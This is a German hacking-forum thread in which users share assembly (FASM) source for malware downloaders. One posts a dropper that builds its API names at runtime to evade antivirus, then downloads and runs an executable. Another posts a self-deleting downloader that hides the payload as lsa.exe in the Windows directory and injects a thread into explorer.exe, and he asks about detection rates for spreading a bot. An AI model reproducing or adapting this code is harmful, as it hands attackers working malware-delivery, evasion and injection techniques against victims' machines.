[Fasm]Web Downloader

[$_staX]

Simpler Webdownloader,
keine Ahnung für was man ihn brauchen kann, aber mir war langweilig.

Code:

include '%include%/WIN32AX.inc'
.data
        url db "url",0
        ziel db "C:\test.exe",0

;paar bytes reservieren
        urlmon rd 10
        Down rd 18
        dllhandle rd 1
        DownloadFile rd 1

.code
main:
;urlmon.dll runtime schreiben, wegen Avs
        mov dword [urlmon], 'U3SM'
        mov dword [urlmon+4d], 'ON.D'
        mov word  [urlmon+1d], 'RL'
        mov word [urlmon+8d], 'LL'
;urlmon.dll laden
        push urlmon
        call [LoadLibraryA]
        mov [dllhandle],eax
;URLDownloadToFileA runtime schreiben
        mov dword [Down], 'UbcD'
        mov dword [Down+4d], 'ownl'
        mov dword [Down+8d], 'oRdT'
        mov word [Down+1d], 'RL'
        mov dword [Down+12d], 'oFil'
        mov word [Down+16d], 'eA'
        mov byte [Down+9d], 'a'
;Api Adresse
        push Down
        push [dllhandle]
        call [GetProcAddress]
        mov [DownloadFile],eax
;Donwload
        push 0
        push 0
        push ziel
        push url
        push 0
        call [DownloadFile]
;Ausführen
        push SW_SHOWNORMAL
        push NULL
        push NULL
        push ziel
        push NULL
        push HWND_DESKTOP
        call [ShellExecuteA]

        push 0
        call [ExitProcess]

.end main

[dr0p]

Hab hier auch noch einen, wie siehts mit der Detection Rate von deinem aus? eventuell was gutes für mich zum Bot spreaden wenn er Fud ist.

; Small selfdeleting downloader
; by DiA/RRLF (c)06
; www.vx-dia.de.vu

include "%fasminc%\win32ax.inc"

macro _invoke proc,[arg]
{ common
if ~ arg eq
reverse
pushd arg
common
end if
call [ebp + proc] }

entry DowloadFile

section '.code' code readable writeable executable

URL db "http://url.com/here.exe", 0 ;the executable to download
SaveAs db "\lsa.exe", 0 ;save as, in windows directory

InetHandle dd ?
UrlHandle dd ?
FileHandle dd ?
ReadNext dd ?
DownloadBuffer rb 1024d
BytesWritten dd ?
WindowsDir rb 256d
ProcessEntryOwn PROCESSENTRY32
SnapHandleOwn dd ?
ProcessHandle dd ?
BaseAddress dd ?
StartupInfo STARTUPINFO
ProcessInfo PROCESS_INFORMATION

DowloadFile:
invoke GetWindowsDirectory,\
WindowsDir,\
256d

invoke lstrcat,\
WindowsDir,\
SaveAs

invoke InternetOpen,\
URL,\
0,\
0,\
0,\
0

cmp eax, 0
je DownloadFileError

mov dword [InetHandle], eax

invoke InternetOpenUrl,\
dword [InetHandle],\
URL,\
0,\
0,\
0,\
0

cmp eax, 0
je DownloadFileError

mov dword [UrlHandle], eax

invoke CreateFile,\
WindowsDir,\
GENERIC_WRITE,\
FILE_SHARE_WRITE,\
0,\
CREATE_NEW,\
FILE_ATTRIBUTE_NORMAL,\
0

cmp eax, 0
je DownloadFileError

mov dword [FileHandle], eax

inc dword [ReadNext]

ReadNextBytes:
cmp dword [ReadNext], 0
je DownloadComplete

invoke InternetReadFile,\
dword [UrlHandle],\
DownloadBuffer,\
1024d,\
ReadNext

invoke WriteFile,\
dword [FileHandle],\
DownloadBuffer,\
dword [ReadNext],\
BytesWritten,\
0

jmp ReadNextBytes

DownloadComplete:
invoke CloseHandle,\
dword [FileHandle]

invoke InternetCloseHandle,\
dword [UrlHandle]

invoke InternetCloseHandle,\
dword [InetHandle]

invoke CreateProcess,\
WindowsDir,\
0,\
0,\
0,\
0,\
CREATE_NEW_CONSOLE,\
0,\
0,\
StartupInfo,\
ProcessInfo

DownloadFileError:
invoke GetModuleFileName,\
0,\
OwnFilename,\
256

invoke LoadLibrary,\
"kernel32.dll"

cmp eax, 0
je Exit

invoke GetProcAddress,\
eax,\
"DeleteFileA"
mov dword [_DeleteFile], eax

mov dword [ProcessEntryOwn.dwSize], sizeof.PROCESSENTRY32

invoke CreateToolhelp32Snapshot,\
2,\
0

cmp eax, 0
je Exit

mov dword [SnapHandleOwn], eax

invoke Process32First,\
dword [SnapHandleOwn],\
ProcessEntryOwn

NextTargetProcess:
cmp eax, 0
je Exit

invoke lstrcmpi,\
ProcessEntryOwn.szExeFile,\
"explorer.exe"

cmp eax, 0
je FoundExplorer

invoke Process32Next,\
dword [SnapHandleOwn],\
ProcessEntryOwn

jmp NextTargetProcess

FoundExplorer:
invoke CloseHandle,\
dword [SnapHandleOwn]

invoke OpenProcess,\
PROCESS_VM_OPERATION + PROCESS_VM_WRITE + PROCESS_CREATE_THREAD,\
0,\
dword [ProcessEntryOwn.th32ProcessID]

cmp eax, 0
je Exit

mov dword [ProcessHandle], eax

invoke VirtualAllocEx,\
dword [ProcessHandle],\
0,\
RemoteThreadEnd - RemoteThreadStart,\
MEM_COMMIT,\
PAGE_READWRITE

cmp eax, 0
je Exit

mov dword [BaseAddress], eax

invoke WriteProcessMemory,\
dword [ProcessHandle],\
dword [BaseAddress],\
RemoteThreadStart,\
RemoteThreadEnd - RemoteThreadStart,\
0

cmp eax, 0
je Exit

invoke CreateRemoteThread,\
dword [ProcessHandle],\
0,\
0,\
dword [BaseAddress],\
0,\
0,\
0

invoke CloseHandle,\
dword [ProcessHandle]

Exit:
invoke ExitProcess,\
0

RemoteThreadStart:
call DeltaOffset

DeltaOffset:
pop ebp
sub ebp, DeltaOffset

DeleteLoop:
lea eax, dword [ebp + OwnFilename]

_invoke _DeleteFile,\
eax

cmp eax, 0
je DeleteLoop

ReturnThread:
ret

RemoteDatas:
OwnFilename rb 256d
_DeleteFile dd ?
RemoteThreadEnd:

section '.idata' import data readable writeable
library kernel, "kernel32.dll",\
wininet, "wininet.dll"

import kernel,\
WriteFile, "WriteFile",\
CreateFile, "CreateFileA",\
CloseHandle, "CloseHandle",\
lstrcat, "lstrcatA",\
GetWindowsDirectory, "GetWindowsDirectoryA",\
GetModuleFileName, "GetModuleFileNameA",\
LoadLibrary, "LoadLibraryA",\
GetProcAddress, "GetProcAddress",\
CreateToolhelp32Snapshot, "CreateToolhelp32Snapshot",\
Process32First, "Process32First",\
Process32Next, "Process32Next",\
lstrcmpi, "lstrcmpiA",\
CreateProcess, "CreateProcessA",\
OpenProcess, "OpenProcess",\
VirtualAllocEx, "VirtualAllocEx",\
WriteProcessMemory, "WriteProcessMemory",\
CreateRemoteThread, "CreateRemoteThread",\
ExitProcess, "ExitProcess"

import wininet,\
InternetOpen, "InternetOpenA",\
InternetOpenUrl, "InternetOpenUrlA",\
InternetReadFile, "InternetReadFile",\
InternetCloseHandle, "InternetCloseHandle"

[l0dsb]

Wieso benutzt ihr Assembler für solche Dinge, ohne irgendeine Notwendigkeit, die Sprache zu verwenden?

[$_staX]

Wieso benutzt ihr Assembler für solche Dinge, ohne irgendeine Notwendigkeit, die Sprache zu verwenden?

Weil mir langweilig war